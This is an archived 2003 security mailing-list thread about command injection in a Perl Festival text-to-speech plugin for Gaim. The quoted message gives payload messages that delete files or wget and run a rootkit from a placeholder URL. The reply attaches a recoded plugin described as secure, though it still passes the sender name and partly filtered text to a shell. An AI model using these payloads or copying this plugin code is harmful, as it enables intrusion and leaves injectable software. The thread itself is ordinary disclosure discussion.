[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Gaim festival plugin exploit

Subject: Re: Gaim festival plugin exploit
From: HCTITS Security Division <security@humancentrictech.com>
Date: 17 Oct 2003 21:05:07 -0400

DUH... would help if I attached my attachment.


I am right proud of myself for this, and it also needs mention to
address the security issue that our friend Error (is that a reference to
Zelda 2?) raised.

Attached, find the latest reissue of the Gaim festival plugin.  The guy
that wrote it, wrote it for pre-0.68 Perl API, but it was secure against
the sort of attack that Error described.  I have since taken it and
recoded it to work with post-0.68 versions of Gaim.  It is attached.  By
all means, if you see an exploitable bug in there, let me know!  I'm
just a perl-tot..

Cheers,
~Brian

On Wed, 2003-10-15 at 11:29, error wrote:
> It has come to my attention that people have actually used this example
> code for a gaim plugin:
> 
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> 
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> 
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> 
> As taken from:
> http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
> 
> This has to be one of the most amusing ways to gain a local users
> privileges I have ever seen by an "Expert (TM)"
> 
> Exploit code?
> You have a shell through gaim with that.
> 
> Just pass it this message (or really any message for that matter):
> 
> Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
> 
> Or perhaps:
> 
> Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
> rootkit;./rootkit
> 
> Perhaps someone should ask:
> 
> "(Is s/[^\w]//g really that hard to do?!)"
> 
> So a fixed version would look like this:
> 
> AIM::register("Festival TTS", "0.0.1", "goodbye", "");
> AIM::print("Perl Says", "Loaded Festival TTS");
> AIM::command("idle", "60000") if ($pro ne "Offline");
> AIM::add_event_handler("event_im_recv", "synthesize");
> 
> sub goodbye {
>       AIM::print("Module Unloaded", "Unloaded Festival TTS");
> }
> 
> sub synthesize {
>     my $string = $_[0];
>     $string =~ s/\<.*?\>//g;
>     $string =~ s/\".*\"//;
>     $string =~ s/[^\w]//g;
>     system("echo \"$string\" | /usr/bin/festival --tts");
> }
> 
> Just a minor comment, nothing special.
-- 
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies

# gabfest.pl
# updated by Brian Henning <brian@cheetah.dynip.com>
# License: GPL
#
# Based upon:
#GAIMFestival.pl
#By:  Matt Davis <agent@sdf.lonestar.org>
#Screen Name:  dasmittel
#License:  GPL
#
#This is a perl plugin written for GAIM version 0.11
#It will make festival read your incoming messages to you
#after stripping out any html tags that the windows clients send
#
#The fork allows the message to be displayed as it is being said.  If
#system was used, the message would not display until after festival was
#done saying it.
#
#03/17/01 

use Gaim;

%PLUGIN_INFO = (
        perl_api_version => 2,
        name             => "GabFest",
        version          => "0.5",
        summary          => "Uses Festival to read incoming instant messages",
        description      => "There's nothing more to say about this plugin.",
        author           => "Matt Davis, recoded by Brian Henning",
        url              => "",
        load             => "plugin_load",
        unload           => "plugin_unload"
);

sub plugin_init {
        return %PLUGIN_INFO;
}

sub plugin_load {
        $plugin = shift;
        Gaim::signal_connect(Gaim::Conversations::handle, "received-im-msg", 
$plugin, \&festival_say, 0);
#       Gaim::signal_connect($plugin, Gaim::Conversation, "received-im-msg", 
\&festival_say);
        unless(fork){exec("echo Gabfest has loaded | artsdsp festival -b 
--tts");}
        Gaim::print("Meaningless Drivel", "The damn thing is loaded, not that 
it does any good.");
}

sub plugin_unload {
        $plugin = shift;
        Gaim::print("GabFest", "GabFest has unloaded.");
}


sub festival_say {

  my ($gc, $sendername, $message, $flags) = @_;
  $_ = $message;
  s/<(?:[^>\'\"]*|([\'\"]).*?\1)*>//gs;  #Parse out most HTML.  See note 1.
  s/\'//g;  #These lines remove characters that cannot be sent to festival
  s/\"//g;  #  via the command line
  s/\(//g;
  s/\)//g;
  s/\>//g;
  s/\<//g;
  s/\;//g;
  $message = $_;
  if ($message ne ""){
    unless (fork){
     exec("echo $sendername said, $message | artsdsp festival -b --tts");}
  } else {
    system("echo The function was called, but there was apparently nothing to 
say | artsdsp festival -b --tts");
  }
  return 0;  
}

#--- Note 1.  This section was taken from the URL below
#http://www.rocketaware.com/perl/perlfaq9/How_do_I_remove_HTML_from_a_stri.htm
#--- Thanks guys.

Follow-Ups:
- Re: [Full-Disclosure] Re: Gaim festival plugin exploit
  - From: Cael Abal <lists@onryou.com>
- Re: Gaim festival plugin exploit
  - From: merlyn@stonehenge.com (Randal L. Schwartz)

References:
- Gaim festival plugin exploit
  - From: error <error@lostinthenoise.net>

Prev by Date: Re: IE remote code execution
Next by Date: [ANNOUNCE] mod_security 1.7 released
Previous by thread: Gaim festival plugin exploit
Next by thread: Re: [Full-Disclosure] Re: Gaim festival plugin exploit
Index(es):
- Date
- Thread